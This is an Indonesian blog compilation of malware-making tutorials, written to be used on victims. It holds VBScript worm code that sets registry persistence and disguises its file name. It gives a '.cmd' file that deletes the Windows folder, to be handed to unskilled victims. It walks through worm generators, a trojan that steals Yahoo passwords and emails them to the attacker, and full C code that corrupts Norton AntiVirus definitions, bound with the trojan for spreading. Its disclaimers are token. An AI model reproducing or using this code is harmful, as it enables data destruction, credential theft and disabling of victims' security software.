‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manip - Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”

‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.

He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.

Cara Nggawe Virus

Untuk men-delete semua file/folder, anda cuma perlu melakukan ini:
DEL /F /Q *Ketik/copy tulisan tsb Di notepad, kemudian save menjadi *.cmd
(ex:antivirus.cmd)Itu akan men-delete semua data yg ada di komputer walaupun itu file/folder read-only dan anda tidak akan diberi konfirmasi untuk melakukan hal itu. Anda tidak akan bisa melakukan apapun jika anda sudah meng-klik file cmd tsb.

PERINGATAN: JANGAN PERNAH SEKALI-KALI ANDA MENCOBA MENG-KLIK JIKA ANDA TELAH MENCIPTAKANNYA, ITU AKAN MERUSAK KOMPUTER ANDA SENDIRI

Jika anda ingin mencoba virus ini, lakukan ini:


Pertama, buat text file bernama TEST.txt di C:\
Selanjutnya, buka notepad, tulis “del C:\TEST.txt” (tanpa tanda quota/”), lalu “Save As…” dan save dengan nama “Percobaan.cmd”(Juga tanpa tanda quota/”)
Berikutnya, klik Percobaan.cmd tadi dan buka drive C:\ anda dan anda akan melihat file TEST.txt anda menghilang

Petunjuk yg simpel:
Buka notepad, tulis DEL /F /Q C:\WINDOWS (kalo anda orang yg tidak terlalu kejam, hapus windowsnya aja, kasian korbannya), kemudian save dengan nama *.cmd (namanya terserah anda, yg penting formatnya .cmd), lalu berikan ini kepada korban yg anda inginkan. Sekali korban membuka/meng-klik file ini, maka WINDOWSnya akan hilang dan dia harus meng-install WINDOWSnya lagi. Dijamin, datanya ilang semua karena dia harus install ulang WINDOWSnya (kalo kita install windows kan datanya terhapus smua, kecuali dia emang ahli komputer, tapi kan pasti kita kasih ni virus sama orang2 yg rada2 gaptech, jd dia ga bs bedain ini virus ato nggak. So, dia asal klik aja deh).

PERINGATAN: INI ADALAH VIRUS YANG SANGAT KUAT, SAYA TIDAK BISA MENJAMIN KEAMANAN ANDA JIKA ANDA MENCOBA MEMBUKA/MENG-KLIK VIRUS INI PADA KOMPUTER ANDA SENDIRI

cara membuat virus instan

Oke, tanpa banyak cang…cing…cong….nyak..babeh…, mari kita mulai dengan ‘Black Project’ yang akan kita ciptakan, siap….????? Oke kita mulai…..
Oooopppss…. Tapi sebelumnya ada yang tau VB+Vimaker32 ga??? Oke, mungkin biar ga bingung and ga tersesat nantinya , saya akan jelaskan sedikit. VB+ViMaker32 adalah sebuah worm generator yang diciptakan khusus untuk menciptakan worm secara mudah,cepat dan instan atau istilah gaulnya GPLLY (ga pake lama la yaw…. J )


Sesuai dengan namanya program ini dapat menciptakan worm dalam bahasa Visual Basic yang akan mempunyai aksi-aksi tertentu sesuai dengan pengaturan yang diberikan. (Bener-bener sesuai dengan pengaturan yang kita kasih lho….), so buat para newbie yang pengen jadi #VM (Virus Maker bo…!) bisa pake ni program buat belajar. Tapi Cuma buat belajar lho, bukan buat mainan atawa yang laen apalagi buat ngerusak komputer orang laen, sesuai dengan tujuan dibuatnya tool ini, Cuma buat pendidikan dan ilmu pengetahuan, (Itu kata pembuatnya….).Oh ya Program ini bisa didownload gratis di blog ini di menu Download Tools. Atau e-mail aj ke sang empunya di: rzwan182@gmail.com.

Oke dech langsung aj kali ye… bis cape ngomong terus dari tadi ga mulai-mulai neh…J Tapi sebelum kita memulai membuat ‘Black Project’ dengan tool ini kita membutuhkan beberapa persyaratan dan tools, yang semuanya bisa didownload di dapur kalian masing-masing:

1. Sebuah gelas yang berisi air panas lengkap dengan sendoknya.
2. Satu sachet cappuccino rasa apa saja yang belum kadaluwarsa, klo ini bisa didownload di warung terdekat… J)
3. Cemilan, kalo bisa yang enak dan ga mengandung lemak.
4. Hati, Pikiran dan niat yang tulus dan ikhlas untuk menanggung segala macam akibat dan resiko yang terjadi apabila kesalahan atau ketidaksengajaan yang menyebabkan worm yang dibuat menjadi raja dikomputer sendiri (sejenis senjata makan tuan gtu…. J)

Sekarang benar-benar mulai deh, setelah didownload, pertama install dulu program VB+Vimaker32-nya tapi sebelumnya backup dulu data2 penting untuk mencegah sesuatu yang tidak diinginkan, truz jalanin file .exe nya, lalu pilih File->Project Baru (Full Load) atau tekan Ctrl+M di keyboard. Hasilnya seperti gambar dibawah ini.

Tampilan VB+Vimaker32 RC 03 :



Masukan semua keterangan tentang virus yang akan dibuat beserta pengaturan-pengaturan lainnya, seperti pengaturan Informasi Virus, Registry, Message dan dll. Masukan semuanya sesuai dengan keinginan, untuk lebih lengkapnya buka aja dokumentasinya yang disertakan. Semua informasi pengaturan settings dll ada disitu. Yang menarik dari program ini adalah karna banyak pengaturan dan kustomasi yang bisa diatur sendiri sesuai dengan kebutuhan, tidak seperti program worm generator lainnya yang cuma tinggal masukin nama pembuat dan pesan yang akan ditampilkan, terasa kurang bebas dan leluasa gtu… J,

Untuk pengaturan tentang registry yang akan diubah bisa diambil di menu Tools-> Registry Action Selector, terdapat 50 Registry Entry yang bisa dipilih, tinggal pilih truz double klik di setingan registry-nya. Truz klik Insert, Cut dan paste di section [REGISTRY]. Selain itu worm yang dibuat dengan tools ini juga bisa membaca caption window yang aktif sehingga jika caption tersebut ada dalam daftar terlarang maka akan otomatis dilumpuhkan. Untuk memilih daftar window caption yang akan dilumpuhkan gunakan Window Caption Selector di menu Tools. Disitu ada 176 daftar caption yang bisa dipilih. Tuh kan ga beda jauh dengan worm lokal sejenisnya. Pokokenya top bgt nih program! He..he… J

Berikut tampilan Registry Action Selector :



Window Caption Selector



Jangan lupa icon virusnya juga bisa diubah, untuk mengganti icon default tinggal ubah di subsection : EXEIcon = \Icons Source\Folder\Folder001.ico
Terdapat banyak pilihan icon yang disediakan didalam folder Icons Source, so tinggal pilih aja…
Terakhir dan merupakan saat yang ditunggu-tunggu adalah melakukan pemeriksaan kode yang telah diketik sebelum dicompile menjadi virus. Klik menu Project->Analisa Project atau tekan F8 untuk menganalisa kode, setelah analisa selesai dan tidak ada kesalahan penulisan kode yang dideteksi maka ‘Black Project’ yang kita buat bisa langsung dicompile. Tekan F9 untuk mengcompile project dan sebuah pesan peringatan akan muncul dan menanyakan apakah proses compile akan dilajutkan, baca dulu semua konsekuensinya truz klo setuju klik yes, maka virus yang kita buat akan langsung dicompile menjadi file executable (.exe)



File virus hasil compile :

File hasil compile memang cukup besar karena tidak otomatis dikompres secara internal, tapi kita masih bisa mengompres dengan program kompresor lain seperti UPX atau tElock. Akhir kata selamat ber-Virus Maker J Semoga artikel ini bermanfaat dan sungguh tak ada niat dari penulis sedikitpun untuk memotivasi agar membuat virus dengan tool ini, tujuan penulis tidak lain hanya berbagi informasi dan pengetahuan dan penulis tidak bertanggung jawab atas segala resiko apapun yang terjadi akibat dari penyalahgunaan artikel ini. Dan penulis ucapkan terima kasih kepada jasakom yang telah bersedia mempublish artikel ini.

Bermain Dengan Virus Trojan

Mari kita bermain2 dengan trojan... tapi sebaiknya sebelum
Anda membaca tulisan ini ada baiknya membaca tulisan gue
sebelumnya tentang "Trojanku Sayang.. Trojanku Hilang"
karena pada tulisan tersebut Anda akan mendapatkan
pengetahuan tentang peralatan pendukung yang bisa digunakan dalam penyerangan mempergunakan trojan.
Anda pernah kehilangan Yahoo Account...?? sehingga email Anda tidak bisa dibuka lagi...??? Itu semua karena Anda ceroboh... Anda kena aksi dari sebuah trojan atau bisa jadi kena Social Engineering... ;) atau apalah.. karena memang banyak cara untuk mengambil alih account yahoo orang lain...
Kali gue mau main2 dengan trojan, nanti trojannya dikasih tugas untuk mendapatkan Yahoo account berupa username + passwordnya.
Trojan ini memang diciptakan dan selalu dikembangkan sesuai dengan perkembangan versi Yahoo Messenger.
Trojannya kita buat dengan trojan generator kemudian kita binding (ikat) dengan aplikasi pem-binding. Nanti hasil dari pembindingannya kita sebar di beberapa tempat, bisa melalui email, kirim langsung melalui YM atau dengan cara membuang (?) CD ditempat tertentu.

Bagaimana caranya?

Persiapan :
[-] Magic-PS Trojan Generator. Bisa Anda download google
[-] File Binder. Anda bisa memanfaatkan file binder apapun.
[-] C Compiler


Target Trojan :
[-] User yang mempergunakan windows (-- yg pake linux aman bro ;)
[-] User yang masih bisa kena 'social engineering' (bro.. terserah gimana caranya deh.. biar tuh user bisa mati'in Antivirusnya....)
Kalo dia ga mau mati'in ya udah nanti kita matikan secara paksa dengan coding tertentu... ingat jangan maen clurit ya? ;) ).


Pembuatan Trojan :
[-] Matikan semua Antivirus yang berada di komputer Anda (--hhikkzzz.. kalo ga dimatikan bakalan ga' bisa bikin trojan).
[-] Buatlah sebuah folder untuk menempatkan hasil trojan.
[-] Copy Magic-PS-15se++ ke dalam folder yang Anda buat, dan eksekusilah trojan generator tersebut.
Keterangan Trojan :

[01] Victim, pada bagian ini Anda bisa memberikan tugas tambahan pada trojan yang Anda inginkan, misalkan saja mengambil IP Address si target.

[02] File After Install, jika trojan ini dieksekusi maka trojan tersebut akan melakukan penyamaran diri berupa file 'regsvr.exe'. Anda bisa memilih file penyamaran lainnya.

[03] Y! ID, isi bagian ini dengan account Yahoo milik Anda. Ingat! Account ID milik Anda juga harus Yahoo! dan proses pengisian pada bagian tersebut tidak disertai "@yahoo.com". Jadi cukup mengisi ID saja. Trojan akan mencuri account + password si target kemudian secara otomatis trojan akan mengirim account tersebut ke email Anda (alamat email yang Anda set di trojan loh...)

[04] Choose icon, silahkan Anda memilih icon penyamaran trojan.

[05] FileName, ini merupakan file trojan hasil generator. File inilah yang nantinya Anda kirim ke target yang menjadi sasaran kita ;)
jangan sekali2 mengeksekusi file ini di komputer milik pribadi.... ;)

[06] Create MPS merupakan tombol yang men-generate trojan.





Penyiapan Routin Pembunuh NAV :

Bye bye NAV. Nah, ini adalah routine yang bisa Anda gunakan untuk membunuh NAV secara paksa. Routine ini dibuat oleh teman saya : Magic_h2001
(Hai 'Magic_h2001'... thx for ur code).

//--- code ----//
/*
Kill Norton AntiVirus (All versions). Local Exploit.
Norton AV can not protect this file : VIRSCAN1.DAT
and can not Detect any virus after modify this file !
(editor: jadi ceritanye nih, file .DAT nya dioverwrite ama data sampah)
*/

#include
int main()
{
HWND Lpbuff;
HKEY handle;
DWORD temp,size;
char buff[255],fName[255],dirName[255];
temp=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\",0,KEY_READ,&handle);
if(temp!=ERROR_SUCCESS)
return 1;
size=sizeof(buff);
temp=RegQueryValueEx(handle,"CommonFilesDir",0,&temp,buff,&size);
if(temp!=ERROR_SUCCESS)
return 1;
RegCloseKey(handle);
strcat(buff,"\\Symantec Shared\\virusdefs\\");
strcpy(fName,buff);
strcat(buff,"definfo.dat");
SetFileAttributes(buff,FILE_ATTRIBUTE_ARCHIVE);
GetPrivateProfileString("DefDates","CurDefs","",dirName,sizeof(dirName),buff);
if(!strcmp(dirName,""))
return 1;
strcat(fName,dirName);
strcat(fName,"\\VIRSCAN1.DAT");
SetFileAttributes(fName,FILE_ATTRIBUTE_ARCHIVE);
handle=CreateFile(fName,GENERIC_WRITE,FILE_SHARE_READ,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(handle==INVALID_HANDLE_VALUE)
return 1;
size=GetFileSize(handle,&temp)-32;
Lpbuff=GlobalAlloc(GMEM_FIXED,size);

if(!Lpbuff)
{
CloseHandle(handle);
return 1;
}
FillMemory(Lpbuff,size,0x90);
SetFilePointer(handle,32,0,FILE_BEGIN);
WriteFile(handle,Lpbuff,size,&temp,NULL);
CloseHandle(handle);
return 0;
}


* Silahkan Anda Compile source code tersebut menjadi sebuah file eksekusi.

//--- code ----//


Proses Penyerangan :

Anggap saja dari beberapa proses tersebut diatas kita sudah mememiliki 2 (dua) file yaitu :
- sender.exe ----> trojan
- killanvir.exe ----> pembunuh NAV.

Kini saatnya Anda melakukan proses Binder terhadap keduanya. Yang terpenting pada proses Binder file yang bekerja pertama adalah killanvir.exe.
Hal ini dilakukan agar sebelum trojannya jalan, NAV sudah terbunuh lebih dulu. Setelah proses binding selesai kini saatnya Anda menyebarkan file tersebut ke target yang dituju. Terserah, dengan metode apapun (sekali lagi, jangan pakai clurit! ;) ).


Selamat menikmati trojan, dan ingat segala yang anda lakukan adalah tanggung jawab anda, anda.

CARA MEMBUAT VIRUS WORM DENGAN MUDAH

Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa njalanin komputer dan punya softwarenya. Lalu apa softwarenya ? VBS Worm Generator !! Dengan program yang dibuat oleh hacker Argentina berusia 18 tahun itu kamu dapat membuat virus yang sama dahsyatnya dengan Anna Kournikova, cukup dengan melakukan beberapa klik.

Program VBSWG memungkinkan kamu untuk membuat worm dengan nama sesukamu. Kamu juga bisa memilih efek dari worm tersebut, seperti misalnya menampilkan pesan atau memaksa seseorang untuk menuju situs tertentu. Akibat yang paling parah tentunya jika worm tersebut kamu setting supaya membikin crash komputer.

Kemampuan lain dari VBSWG adalah melakukan enkripsi terhadap source code worm yang dibuat. Kemampuan lainnya bisa kamu coba sendiri :-) Pokoknya cukup hebatlah program ini.

Tapi seperti yang dikatakan oleh pembuatnya, VBS Worm Generator hanya boleh digunakan untuk belajar, bukan untuk merugikan orang lain. Untuk itu jika Anda memang berniat mencobanya, ingat-ingat peringatan tersebut.

aplikasi tersebut dapat di download lewat link ini dalam bentuk .zip